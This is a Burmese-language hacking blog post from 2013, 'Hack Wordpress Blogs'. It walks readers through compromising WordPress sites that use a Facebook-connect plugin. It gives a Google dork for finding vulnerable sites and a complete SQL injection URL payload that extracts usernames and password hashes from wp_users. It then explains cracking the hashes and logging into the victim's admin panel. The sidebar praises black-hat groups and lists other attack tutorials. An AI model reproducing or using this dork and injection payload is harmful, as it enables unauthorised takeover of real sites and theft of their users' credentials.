Wordpress Site ေတာ္ေတာ္မ်ားမ်ားဟာ သူတို ့ရဲ ့ site မွာ facebook နဲ ့ခ်ိပ္ဆက္ ဖို ့အတြက္ wordpress plugin ေတြကို အမ်ားအားျဖင့္အသံုးျပဳၾကပါတယ္။
အဲ့ဒီလို wordpress plugin ေတြ အသံုးျပဳျခင္းဟာ ေကာင္းတဲ ့အခ်က္ေတြရွိသလို ဆိုးတဲ့အခ်က္ေတြလည္းရွိပါတယ္။
အဲ့ဒီထဲကမွာ အဆိုးဆံုး အခ်က္ကေတာ့ အဲ့ဒီ plugin ကေနတဆင့္ အၾကီးမားဆံုး security ပိုင္းအားနည္းခ်က္ျဖစ္ေပၚလာျခင္းပါပဲ။
Wordpress plugin သံုးထားတဲ ့ site ေတာ္ေတာ္မ်ားမ်ားကို hacked လုပ္ဖို ့အတြက္
Step 1 : www.google.com ကိုသြားလိုက္ပါ။
Step 2 : ေအာက္မွာ ေပးထားတဲ ့dork ေလးကို အသံုးျပဳျပီး security hole ျဖစ္ေနတဲ ့site ကို ရွာေဖြ လိုက္ပါ။
inurl:"fbconnect_action=myhome"
Step 3 : Security ပိုင္းအားနည္းေနတဲ ့ site မ်ား ကိုေဖာ္ျပထားမွာျဖစ္ျပီး အဲ့ဒီ site ေတြထဲကမွ အဆင္ေျပရာ site တစ္ခုကို ေရြးလိုက္ပါ။
Step 4 : ေရြးခ်ယ္လိုက္တဲ ့ site's link ထဲက
?fbconnect_action=myhome&userid=
ေနရာမွာ ေအာက္မွာေဖာ္ျပထားတာ ကို အစားသြင္းလိုက္ပါ
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--
Step 5 : ဒါဆိုရင္ေတာ့ user name နဲ ့ password ကိုရရွိမွာျဖစ္ပါတယ္။
Step 6 : ရရွိလာတဲ ့ password ဟာ hash password အမ်ိဳးအစားျဖစ္ပါတယ္ ။
အဲ့ဒီ hash password ကို decode ျပဳလုပ္ဖို ့အတြက္ wordpress md5 (blowfish) လိုအပ္ပါတယ္။
ဒီေနရာမွာ download ျပဳလုပ္ပါ။ download လုပ္ျပီး run လိုက္ပါ။ ထို ့ေနာက္ မိမိ ရရွိထားတဲ့ hash password ကို copy/paste ျပဳလုပ္ျပီး decode လုပ္လိုက္ပါ။
Step 7 : Administrator panel ကို ရွာေဖြပါ။ အမ်ားအားျဖင့္ေတာ့ admin panel ကို ေအာက္ပါအတိုင္းရွာေဖြႏုိင္ပါတယ္။
www.victimsite.com/wp-admin သို ့မဟုတ္ www.victimsite.com/wp-login.php
(victimsite ေနရာမွာ မိမိ ေရြးခ်ယ္ထားတဲ ့site address ထည့္ရမွာျဖစ္ပါတယ္)
ဒါဆိုရင္ေတာ့ step 5 မွာရရွိထားတဲ့ username နဲ ့decode လုပ္လို ့ရထားတဲ့ password ကိုရရွိျပီးျဖစ္တဲ့အတြက္ အသံုးျပဳႏုိင္ပါျပီ။
Monday, June 10, 2013
//
Labels:
Hacking Tutorial
//
1 comments
//
1 comments to "Hack Wordpress Blogs"
Post a Comment
သင့္ရဲ ့ comment မ်ားက ကြ်န္ေတာ္တို႔လို blogger ေတြ အတြက္ အားေဆးတစ္ခြက္ပါ။
ေကာင္းသည္၊ ဆုိးသည္ ေရးႏုိင္ပါသည္။ လိုအပ္သည္မ်ားကိုလည္းေဝဖန္အၾကံေပးႏုိင္ပါသည္။
Powered by Blogger.
Respect List
Blink Hacker Group
Myanmar Hacker Uniteam
Brotherhood of Myanmar Hackers
and All Myanmar Attackers & All Myanmar Black Hats.
Myanmar Hacker Uniteam
Brotherhood of Myanmar Hackers
and All Myanmar Attackers & All Myanmar Black Hats.
Categories
@Lph@ blog ကို Android Devices ေတြေပၚကဖတ္ခ်င္ရင္
Link list 1
- Application (1)
- E-book (2)
- Facebook Tips & Tricks (2)
- Hacking Tutorial (37)
- HTML (2)
- Kali Linux (6)
- Mobile Tips & Tricks (5)
- Myanmar Cyber Army (1)
Popular Posts
-
Introduction to Proxy အခုဒီ post မွာေတာ့ Proxy ဆိုတာဘာလဲ ဘယ္လိုအသံုး၀င္သလဲ ဆိုတာေတြကို ရွင္းျပေပးသြားပါမယ္။ Proxy ဆိုတာ user နဲ ့ serve...
-
ဒီတစ္ခါေတာ့ wireless network ရဲ ့ security ပိုင္းနဲ ့ပတ္သတ္ျပီး က်ေနာ္ တီးမိေခါက္မိ သေလာက္ေလး ကို share ေပးတဲ့သေဘာပါ။ Wireless Network ဆ...
Followers
စည္းလုံးျခင္းသံစဥ္ေရဒီယုိ
Blog Archive
-
▼
2013
(56)
-
▼
June
(26)
- Android Bot Maker
- How to get someone IP Address
- Linux Sever တစ္ခုကို ဘယ္လို Root လုပ္မလဲ
- USB drive အသံုးျပဳျပီး Password မ်ားခိုးယူျခင္း
- Rooting A Server
- Inserting Keylogger Code in Android SwiftKey Using...
- Android Keylogger
- Firewall ကို Back Door / Trojan Virus ႏွင့္ ခ်ိဳးေ...
- Basic Spreading Method
- WordPress ရဲ ့ Zer0 Day Exploit
- Website Admin Panel ကို အလြယ္ကူဆံုး hack နည္း
- Hacking Paypal Accounts
- Hacking Joomla Sites
- DNN Method - Website Hacking
- Protect your Facebook account from hackers with My...
- Hack Wordpress Blogs
- Hack Unsecured Webcams
- How to secure your server from PHP Shells!
- HTML ဆုိတာဘာလဲ ?
- HTML မိတ္ဆက္
- IIS Exploit - Easiest way to deface Website [Windo...
- Hack YAHOO IDs by Brute Force Attack
- SMS Spoffer
- Hack / Bypass .asp sites using SQL Injection
- Hacking 800 Collection
- Blog ရဲ ့ရည္ရြယ္ခ်က္
-
▼
June
(26)
Naypaing says:
download file ကို ဘယ္လိုေဒၚရမလဲဗ်ာ